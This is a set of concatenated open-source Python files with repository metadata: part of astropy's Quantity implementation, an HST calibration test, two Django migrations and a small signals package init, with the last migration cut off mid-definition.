raise ValueError(f"Unknown format '{format}'")
elif format is None:
return f'{self.value}{self._unitstr:s}'
# else, for the moment we assume format="latex"
# need to do try/finally because "threshold" cannot be overridden
# with array2string
pops = np.get_printoptions()
format_spec = '.{}g'.format(
precision if precision is not None else pops['precision'])
def float_formatter(value):
return Latex.format_exponential_notation(value,
format_spec=format_spec)
def complex_formatter(value):
return '({}{}i)'.format(
Latex.format_exponential_notation(value.real,
format_spec=format_spec),
Latex.format_exponential_notation(value.imag,
format_spec='+' + format_spec))
try:
formatter = {'float_kind': float_formatter,
'complex_kind': complex_formatter}
if conf.latex_array_threshold > -1:
np.set_printoptions(threshold=conf.latex_array_threshold,
formatter=formatter)
# the view is needed for the scalar case - value might be float
if NUMPY_LT_1_14: # style deprecated in 1.14
latex_value = np.array2string(
self.view(np.ndarray),
style=(float_formatter if self.dtype.kind == 'f'
else complex_formatter if self.dtype.kind == 'c'
else repr),
max_line_width=np.inf, separator=',~')
else:
latex_value = np.array2string(
self.view(np.ndarray),
max_line_width=np.inf, separator=',~')
latex_value = latex_value.replace('...', r'\dots')
finally:
np.set_printoptions(**pops)
# Format unit
# [1:-1] strips the '$' on either side needed for math mode
latex_unit = (self.unit._repr_latex_()[1:-1] # note this is unicode
if self.unit is not None
else _UNIT_NOT_INITIALISED)
delimiter_left, delimiter_right = formats[format][subfmt]
return r'{left}{0} \; {1}{right}'.format(latex_value, latex_unit,
left=delimiter_left,
right=delimiter_right)
def __str__(self):
return self.to_string()
def __repr__(self):
prefixstr = '<' + self.__class__.__name__ + ' '
sep = ',' if NUMPY_LT_1_14 else ', '
arrstr = np.array2string(self.view(np.ndarray), separator=sep,
prefix=prefixstr)
return f'{prefixstr}{arrstr}{self._unitstr:s}>'
def _repr_latex_(self):
"""
Generate a latex representation of the quantity and its unit.
Returns
-------
        str
            A LaTeX string with the contents of this Quantity.
"""
# NOTE: This should change to display format in a future release
return self.to_string(format='latex', subfmt='inline')
def __format__(self, format_spec):
"""
Format quantities using the new-style python formatting codes
as specifiers for the number.
If the format specifier correctly applies itself to the value,
then it is used to format only the value. If it cannot be
applied to the value, then it is applied to the whole string.
"""
try:
value = format(self.value, format_spec)
full_format_spec = "s"
except ValueError:
value = self.value
full_format_spec = format_spec
return format(f"{value}{self._unitstr:s}",
full_format_spec)
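    # Hedged sketch of the format handling above (assumes
    # ``import astropy.units as u``):
    #     >>> f"{1.2345 * u.m:.2f}"   # the spec formats the value only
    #     '1.23 m'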
def decompose(self, bases=[]):
"""
Generates a new `Quantity` with the units
decomposed. Decomposed units have only irreducible units in
them (see `astropy.units.UnitBase.decompose`).
Parameters
----------
bases : sequence of UnitBase, optional
The bases to decompose into. When not provided,
decomposes down to any irreducible units. When provided,
the decomposed result will only contain the given units.
            This will raise a `~astropy.units.UnitsError` if it is not possible
to do so.
Returns
-------
newq : `~astropy.units.Quantity`
A new object equal to this quantity with units decomposed.
"""
return self._decompose(False, bases=bases)
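    # Hedged sketch (assumes ``import astropy.units as u``; exact repr may
    # vary):
    #     >>> (1. * u.J).decompose()   # -> <Quantity 1. kg m2 / s2>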
def _decompose(self, allowscaledunits=False, bases=[]):
"""
Generates a new `Quantity` with the units decomposed. Decomposed
units have only irreducible units in them (see
`astropy.units.UnitBase.decompose`).
Parameters
----------
allowscaledunits : bool
If True, the resulting `Quantity` may have a scale factor
associated with it. If False, any scaling in the unit will
be subsumed into the value of the resulting `Quantity`
bases : sequence of UnitBase, optional
The bases to decompose into. When not provided,
decomposes down to any irreducible units. When provided,
the decomposed result will only contain the given units.
            This will raise a `~astropy.units.UnitsError` if it is not possible
to do so.
Returns
-------
newq : `~astropy.units.Quantity`
A new object equal to this quantity with units decomposed.
"""
new_unit = self.unit.decompose(bases=bases)
# Be careful here because self.value usually is a view of self;
# be sure that the original value is not being modified.
if not allowscaledunits and hasattr(new_unit, 'scale'):
new_value = self.value * new_unit.scale
new_unit = new_unit / new_unit.scale
return self._new_view(new_value, new_unit)
else:
return self._new_view(self.copy(), new_unit)
# These functions need to be overridden to take into account the units
# Array conversion
# http://docs.scipy.org/doc/numpy/reference/arrays.ndarray.html#array-conversion
def item(self, *args):
return self._new_view(super().item(*args))
def tolist(self):
raise NotImplementedError("cannot make a list of Quantities. Get "
"list of values with q.value.list()")
def _to_own_unit(self, value, check_precision=True):
try:
_value = value.to_value(self.unit)
except AttributeError:
# We're not a Quantity, so let's try a more general conversion.
# Plain arrays will be converted to dimensionless in the process,
# but anything with a unit attribute will use that.
as_quantity = Quantity(value)
try:
_value = as_quantity.to_value(self.unit)
except UnitsError:
# last chance: if this was not something with a unit
# and is all 0, inf, or nan, we treat it as arbitrary unit.
if (not hasattr(value, 'unit') and
can_have_arbitrary_unit(as_quantity.value)):
_value = as_quantity.value
else:
raise
if check_precision:
# If, e.g., we are casting double to float, we want to fail if
# precision is lost, but let things pass if it works.
_value = np.array(_value, copy=False)
if not np.can_cast(_value.dtype, self.dtype):
self_dtype_array = np.array(_value, self.dtype)
if not np.all(np.logical_or(self_dtype_array == _value,
np.isnan(_value))):
raise TypeError("cannot convert value type to array type "
"without precision loss")
return _value
def itemset(self, *args):
if len(args) == 0:
raise ValueError("itemset must have at least one argument")
self.view(np.ndarray).itemset(*(args[:-1] +
(self._to_own_unit(args[-1]),)))
def tostring(self, order='C'):
raise NotImplementedError("cannot write Quantities to string. Write "
"array with q.value.tostring(...).")
def tofile(self, fid, sep="", format="%s"):
raise NotImplementedError("cannot write Quantities to file. Write "
"array with q.value.tofile(...)")
def dump(self, file):
raise NotImplementedError("cannot dump Quantities to file. Write "
"array with q.value.dump()")
def dumps(self):
raise NotImplementedError("cannot dump Quantities to string. Write "
"array with q.value.dumps()")
# astype, byteswap, copy, view, getfield, setflags OK as is
def fill(self, value):
self.view(np.ndarray).fill(self._to_own_unit(value))
# Shape manipulation: resize cannot be done (does not own data), but
# shape, transpose, swapaxes, flatten, ravel, squeeze all OK. Only
# the flat iterator needs to be overwritten, otherwise single items are
# returned as numbers.
@property
def flat(self):
"""A 1-D iterator over the Quantity array.
This returns a ``QuantityIterator`` instance, which behaves the same
as the `~numpy.flatiter` instance returned by `~numpy.ndarray.flat`,
and is similar to, but not a subclass of, Python's built-in iterator
object.
"""
return QuantityIterator(self)
@flat.setter
def flat(self, value):
y = self.ravel()
y[:] = value
# Item selection and manipulation
# repeat, sort, compress, diagonal OK
def take(self, indices, axis=None, out=None, mode='raise'):
out = super().take(indices, axis=axis, out=out, mode=mode)
# For single elements, ndarray.take returns scalars; these
# need a new view as a Quantity.
if type(out) is not type(self):
out = self._new_view(out)
return out
def put(self, indices, values, mode='raise'):
self.view(np.ndarray).put(indices, self._to_own_unit(values), mode)
def choose(self, choices, out=None, mode='raise'):
raise NotImplementedError("cannot choose based on quantity. Choose "
"using array with q.value.choose(...)")
# ensure we do not return indices as quantities
def argsort(self, axis=-1, kind='quicksort', order=None):
return self.view(np.ndarray).argsort(axis=axis, kind=kind, order=order)
def searchsorted(self, v, *args, **kwargs):
return np.searchsorted(np.array(self),
self._to_own_unit(v, check_precision=False),
*args, **kwargs) # avoid numpy 1.6 problem
def argmax(self, axis=None, out=None):
return self.view(np.ndarray).argmax(axis, out=out)
def argmin(self, axis=None, out=None):
return self.view(np.ndarray).argmin(axis, out=out)
def __array_function__(self, function, types, args, kwargs):
"""Wrap numpy functions, taking care of units.
Parameters
----------
function : callable
Numpy function to wrap
types : iterable of classes
Classes that provide an ``__array_function__`` override. Can
in principle be used to interact with other classes. Below,
mostly passed on to `~numpy.ndarray`, which can only interact
with subclasses.
args : tuple
Positional arguments provided in the function call.
kwargs : dict
Keyword arguments provided in the function call.
Returns
-------
        result : `~astropy.units.Quantity` or `~numpy.ndarray`
As appropriate for the function. If the function is not
supported, `NotImplemented` is returned, which will lead to
a `TypeError` unless another argument overrode the function.
Raises
------
~astropy.units.UnitsError
If operands have incompatible units.
"""
# A function should be in one of the following sets of dicts:
# 1. SUBCLASS_SAFE_FUNCTIONS (set), if the numpy implementation
# supports Quantity; we pass on to ndarray.__array_function__.
# 2. FUNCTION_HELPERS (dict), if the numpy implementation is usable
# after converting quantities to arrays with suitable units,
# and possibly setting units on the result.
# 3. DISPATCHED_FUNCTIONS (dict), if the function makes sense but
# requires a Quantity-specific implementation.
# 4. UNSUPPORTED_FUNCTIONS (set), if the function does not make sense.
# For now, since we may not yet have complete coverage, if a
# function is in none of the above, we simply call the numpy
# implementation.
if function in SUBCLASS_SAFE_FUNCTIONS:
return super().__array_function__(function, types, args, kwargs)
elif function in FUNCTION_HELPERS:
function_helper = FUNCTION_HELPERS[function]
try:
args, kwargs, unit, out = function_helper(*args, **kwargs)
except NotImplementedError:
return self._not_implemented_or_raise(function, types)
result = super().__array_function__(function, types, args, kwargs)
# Fall through to return section
elif function in DISPATCHED_FUNCTIONS:
dispatched_function = DISPATCHED_FUNCTIONS[function]
try:
result, unit, out = dispatched_function(*args, **kwargs)
except NotImplementedError:
return self._not_implemented_or_raise(function, types)
# Fall through to return section
elif function in UNSUPPORTED_FUNCTIONS:
return NotImplemented
else:
warnings.warn("function '{}' is not known to astropy's Quantity. "
"Will run it anyway, hoping it will treat ndarray "
"subclasses correctly. Please raise an issue at "
"https://github.com/astropy/astropy/issues. "
.format(function.__name__), AstropyWarning)
return super().__array_function__(function, types, args, kwargs)
# If unit is None, a plain array is expected (e.g., boolean), which
# means we're done.
# We're also done if the result was NotImplemented, which can happen
# if other inputs/outputs override __array_function__;
# hopefully, they can then deal with us.
if unit is None or result is NotImplemented:
return result
return self._result_as_quantity(result, unit, out=out)
def _not_implemented_or_raise(self, function, types):
# Our function helper or dispatcher found that the function does not
# work with Quantity. In principle, there may be another class that
# knows what to do with us, for which we should return NotImplemented.
# But if there is ndarray (or a non-Quantity subclass of it) around,
# it quite likely coerces, so we should just break.
if any(issubclass(t, np.ndarray) and not issubclass(t, Quantity)
for t in types):
raise TypeError("the Quantity implementation cannot handle {} "
"with the given arguments."
.format(function)) from None
else:
return NotImplemented
# Calculation -- override ndarray methods to take into account units.
# We use the corresponding numpy functions to evaluate the results, since
# the methods do not always allow calling with keyword arguments.
# For instance, np.array([0.,2.]).clip(a_min=0., a_max=1.) gives
# TypeError: 'a_max' is an invalid keyword argument for this function.
def _wrap_function(self, function, *args, unit=None, out=None, **kwargs):
"""Wrap a numpy function that processes self, returning a Quantity.
Parameters
----------
function : callable
Numpy function to wrap.
args : positional arguments
Any positional arguments to the function beyond the first argument
(which will be set to ``self``).
kwargs : keyword arguments
Keyword arguments to the function.
If present, the following arguments are treated specially:
unit : `~astropy.units.Unit`
Unit of the output result. If not given, the unit of ``self``.
out : `~astropy.units.Quantity`
A Quantity instance in which to store the output.
Notes
-----
Output should always be assigned via a keyword argument, otherwise
no proper account of the unit is taken.
Returns
-------
out : `~astropy.units.Quantity`
Result of the function call, with the unit set properly.
"""
if unit is None:
unit = self.unit
# Ensure we don't loop back by turning any Quantity into array views.
args = (self.value,) + tuple((arg.value if isinstance(arg, Quantity)
else arg) for arg in args)
if out is not None:
# If pre-allocated output is used, check it is suitable.
# This also returns array view, to ensure we don't loop back.
arrays = tuple(arg for arg in args if isinstance(arg, np.ndarray))
kwargs['out'] = check_output(out, unit, arrays, function=function)
# Apply the function and turn it back into a Quantity.
result = function(*args, **kwargs)
return self._result_as_quantity(result, unit, out)
if NUMPY_LT_1_17:
def clip(self, a_min, a_max, out=None):
return self._wrap_function(np.clip, self._to_own_unit(a_min),
self._to_own_unit(a_max), out=out)
def trace(self, offset=0, axis1=0, axis2=1, dtype=None, out=None):
return self._wrap_function(np.trace, offset, axis1, axis2, dtype,
out=out)
def var(self, axis=None, dtype=None, out=None, ddof=0):
return self._wrap_function(np.var, axis, dtype,
out=out, ddof=ddof, unit=self.unit**2)
def std(self, axis=None, dtype=None, out=None, ddof=0):
return self._wrap_function(np.std, axis, dtype, out=out, ddof=ddof)
def mean(self, axis=None, dtype=None, out=None):
return self._wrap_function(np.mean, axis, dtype, out=out)
def round(self, decimals=0, out=None):
return self._wrap_function(np.round, decimals, out=out)
def dot(self, b, out=None):
result_unit = self.unit * getattr(b, 'unit', dimensionless_unscaled)
return self._wrap_function(np.dot, b, out=out, unit=result_unit)
# Calculation: override methods that do not make sense.
def all(self, axis=None, out=None):
raise NotImplementedError("cannot evaluate truth value of quantities. "
"Evaluate array with q.value.all(...)")
def any(self, axis=None, out=None):
raise NotImplementedError("cannot evaluate truth value of quantities. "
"Evaluate array with q.value.any(...)")
# Calculation: numpy functions that can be overridden with methods.
def diff(self, n=1, axis=-1):
return self._wrap_function(np.diff, n, axis)
def ediff1d(self, to_end=None, to_begin=None):
return self._wrap_function(np.ediff1d, to_end, to_begin)
def nansum(self, axis=None, out=None, keepdims=False):
return self._wrap_function(np.nansum, axis,
out=out, keepdims=keepdims)
def insert(self, obj, values, axis=None):
"""
Insert values along the given axis before the given indices and return
a new `~astropy.units.Quantity` object.
This is a thin wrapper around the `numpy.insert` function.
Parameters
----------
obj : int, slice or sequence of ints
Object that defines the index or indices before which ``values`` is
inserted.
values : array-like
Values to insert. If the type of ``values`` is different
from that of quantity, ``values`` is converted to the matching type.
            ``values`` should be shaped so that it can be broadcast appropriately.
The unit of ``values`` must be consistent with this quantity.
axis : int, optional
Axis along which to insert ``values``. If ``axis`` is None then
the quantity array is flattened before insertion.
Returns
-------
out : `~astropy.units.Quantity`
A copy of quantity with ``values`` inserted. Note that the
insertion does not occur in-place: a new quantity array is returned.
Examples
--------
>>> import astropy.units as u
>>> q = [1, 2] * u.m
>>> q.insert(0, 50 * u.cm)
<Quantity [ 0.5, 1., 2.] m>
>>> q = [[1, 2], [3, 4]] * u.m
>>> q.insert(1, [10, 20] * u.m, axis=0)
<Quantity [[ 1., 2.],
[ 10., 20.],
[ 3., 4.]] m>
>>> q.insert(1, 10 * u.m, axis=1)
<Quantity [[ 1., 10., 2.],
[ 3., 10., 4.]] m>
"""
out_array = np.insert(self.value, obj, self._to_own_unit(values), axis)
return self._new_view(out_array)
class SpecificTypeQuantity(Quantity):
"""Superclass for Quantities of specific physical type.
Subclasses of these work just like :class:`~astropy.units.Quantity`, except
that they are for specific physical types (and may have methods that are
only appropriate for that type). Astropy examples are
:class:`~astropy.coordinates.Angle` and
:class:`~astropy.coordinates.Distance`
At a minimum, subclasses should set ``_equivalent_unit`` to the unit
associated with the physical type.
"""
# The unit for the specific physical type. Instances can only be created
# with units that are equivalent to this.
_equivalent_unit = None
# The default unit used for views. Even with `None`, views of arrays
    # without units are possible, but will have an uninitialized unit.
_unit = None
# Default unit for initialization through the constructor.
_default_unit = None
# ensure that we get precedence over our superclass.
__array_priority__ = Quantity.__array_priority__ + 10
def __quantity_subclass__(self, unit):
if unit.is_equivalent(self._equivalent_unit):
return type(self), True
else:
return super().__quantity_subclass__(unit)[0], False
def _set_unit(self, unit):
if unit is None or not unit.is_equivalent(self._equivalent_unit):
raise UnitTypeError(
"{} instances require units equivalent to '{}'"
.format(type(self).__name__, self._equivalent_unit) +
(", but no unit was given." if unit is None else
f", so cannot set it to '{unit}'."))
super()._set_unit(unit)
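# A hedged sketch of a minimal subclass (``Length`` is illustrative only, not
# part of astropy; assumes ``import astropy.units as u``):
#     class Length(SpecificTypeQuantity):
#         _equivalent_unit = u.m
#     Length(5., u.cm)   # fine: cm is equivalent to m
#     Length(5., u.s)    # raises UnitTypeError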
def isclose(a, b, rtol=1.e-5, atol=None, **kwargs):
"""
    Return True if two arrays are element-wise equal within a tolerance.
    Notes
    -----
    This is a :class:`~astropy.units.Quantity`-aware version of
    :func:`numpy.isclose`.
"""
return np.isclose(*_unquantify_allclose_arguments(a, b, rtol, atol),
**kwargs)
def allclose(a, b, rtol=1.e-5, atol=None, **kwargs):
"""
    Return True if two arrays are element-wise equal within a tolerance.
    Notes
    -----
    This is a :class:`~astropy.units.Quantity`-aware version of
    :func:`numpy.allclose`.
"""
return np.allclose(*_unquantify_allclose_arguments(a, b, rtol, atol),
**kwargs)
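# Hedged sketch for the Quantity-aware helpers above (assumes
# ``import astropy.units as u``):
#     >>> allclose(1. * u.km, 1000. * u.m)               # -> True
#     >>> isclose([1., 2.] * u.m, [100., 201.] * u.cm)   # -> [True, False]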
def _unquantify_allclose_arguments(actual, desired, rtol, atol):
actual = Quantity(actual, subok=True, copy=False)
desired = Quantity(desired, subok=True, copy=False)
try:
desired = desired.to(actual.unit)
except UnitsError:
raise UnitsError("Units for 'desired' ({}) and 'actual' ({}) "
"are not convertible"
.format(desired.unit, actual.unit))
if atol is None:
# by default, we assume an absolute tolerance of 0
atol = Quantity(0)
else:
atol = Quantity(atol, subok=True, copy=False)
try:
atol = atol.to(actual.unit)
except UnitsError:
raise UnitsError("Units for 'atol' ({}) and 'actual' ({}) "
"are not convertible"
.format(atol.unit, actual.unit))
rtol = Quantity(rtol, subok=True, copy=False)
try:
rtol = rtol.to(dimensionless_unscaled)
except Exception:
raise UnitsError("`rtol` should be dimensionless")
return actual.value, desired.value, rtol.value, atol.value
|
bsipocz/astropy
|
astropy/units/quantity.py
|
Python
|
bsd-3-clause
| 70,750
|
import subprocess
import pytest
from ..helpers import BaseWFC3
class TestIR10Single(BaseWFC3):
"""Tests for WFC3/IR."""
detector = 'ir'
def _single_raw_calib(self, rootname):
raw_file = '{}_raw.fits'.format(rootname)
# Prepare input file.
self.get_input_file(raw_file)
# Run CALWF3
subprocess.call(['calwf3.e', raw_file, '-v'])
# Compare results
outputs = [('{}_flt.fits'.format(rootname),
'{}_flt_ref.fits'.format(rootname)),
('{}_ima.fits'.format(rootname),
'{}_ima_ref.fits'.format(rootname))]
self.compare_outputs(outputs)
# ib2k03dlq = Ported from calwf3_ir_10
@pytest.mark.parametrize(
'rootname', ['ib2k03dlq'])
def test_ir_10single(self, rootname):
self._single_raw_calib(rootname)
|
jhunkeler/hstcal
|
tests/wfc3/test_ir_10single.py
|
Python
|
bsd-3-clause
| 861
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'UniApplicationEntry.reason'
db.delete_column('uniapply_uniapplicationentry', 'reason')
# Adding M2M table for field materials on 'UniApplicationEntry'
db.create_table('uniapply_uniapplicationentry_materials', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('uniapplicationentry', models.ForeignKey(orm['uniapply.uniapplicationentry'], null=False)),
('materialentry', models.ForeignKey(orm['materials.materialentry'], null=False))
))
db.create_unique('uniapply_uniapplicationentry_materials', ['uniapplicationentry_id', 'materialentry_id'])
def backwards(self, orm):
# Adding field 'UniApplicationEntry.reason'
db.add_column('uniapply_uniapplicationentry', 'reason', self.gf('django.db.models.fields.TextField')(default='', blank=True), keep_default=False)
# Removing M2M table for field materials on 'UniApplicationEntry'
db.delete_table('uniapply_uniapplicationentry_materials')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'classes.logicalclass': {
'Meta': {'object_name': 'LogicalClass'},
'date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'major': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['classes.Major']"}),
'seq': ('django.db.models.fields.IntegerField', [], {})
},
'classes.major': {
'Meta': {'object_name': 'Major'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'shortname': ('django.db.models.fields.CharField', [], {'max_length': '4'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'materials.materialentry': {
'Meta': {'object_name': 'MaterialEntry'},
'content': ('django.db.models.fields.TextField', [], {}),
'ctime': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_locked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mtime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'uniapply.auditingrule': {
'Meta': {'object_name': 'AuditingRule'},
'auditer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'niceness': ('django.db.models.fields.IntegerField', [], {}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['uniapply.Target']"})
},
'uniapply.auditoutcome': {
'Meta': {'object_name': 'AuditOutcome'},
'entry': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['uniapply.UniApplicationEntry']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reason': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'rule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['uniapply.AuditingRule']"}),
'status': ('django.db.models.fields.IntegerField', [], {})
},
'uniapply.target': {
'Meta': {'object_name': 'Target'},
'allow_blank_reason': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'allowed_classes': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['classes.LogicalClass']", 'symmetrical': 'False'}),
'desc': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end_date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'pagelink': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'uniapply.uniapplicationentry': {
'Meta': {'object_name': 'UniApplicationEntry'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'materials': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['materials.MaterialEntry']", 'symmetrical': 'False'}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['uniapply.Target']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['uniapply']
|
team-xue/xue
|
xue/uniapply/migrations/0003_use_material.py
|
Python
|
bsd-3-clause
| 8,698
|
# -*- coding: utf-8 -*-
__author__ = 'Christopher D\'Cunha'
__email__ = 'me@christopherdcunha.com'
__version__ = '0.1.0'
from .signals import *
__all__ = [
'pre_get_detail', 'pre_put_detail', 'pre_post_detail', 'pre_delete_detail',
'pre_get_list', 'pre_put_list', 'pre_post_list', 'pre_delete_list',
'post_get_detail', 'post_put_detail', 'post_post_detail',
'post_delete_detail',
'post_get_list', 'post_put_list', 'post_post_list', 'post_delete_list'
]
|
christopherdcunha/tastypie_signals
|
tastypie_signals/__init__.py
|
Python
|
bsd-3-clause
| 476
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-01-10 16:38
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [("repository", "0001_initial"), ("build", "0001_initial")]
operations = [
migrations.CreateModel(
name="TestClass",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(db_index=True, max_length=255)),
(
"repo",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="testclasses",
to="repository.Repository",
),
),
],
options={
"verbose_name": "Test Class",
"verbose_name_plural": "Test Classes",
},
),
migrations.CreateModel(
name="TestCodeUnit",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("unit", models.TextField(db_index=True)),
("unit_type", models.CharField(db_index=True, max_length=255)),
("duration", models.FloatField(blank=True, db_index=True, null=True)),
(
"event",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"sobject",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"email_invocations_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"email_invocations_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"soql_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"soql_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"future_calls_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"future_calls_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"cpu_time_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"cpu_time_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"query_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"query_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_statements_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_statements_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"mobile_apex_push_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"mobile_apex_push_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"heap_size_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"heap_size_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"sosl_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"sosl_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"queueable_jobs_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"queueable_jobs_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"callouts_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"callouts_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_email_invocations_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_email_invocations_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_soql_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_soql_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_future_calls_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_future_calls_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_cpu_time_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_cpu_time_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_query_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_query_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_statements_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_statements_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_mobile_apex_push_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_mobile_apex_push_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_heap_size_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_heap_size_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_sosl_queries_used",
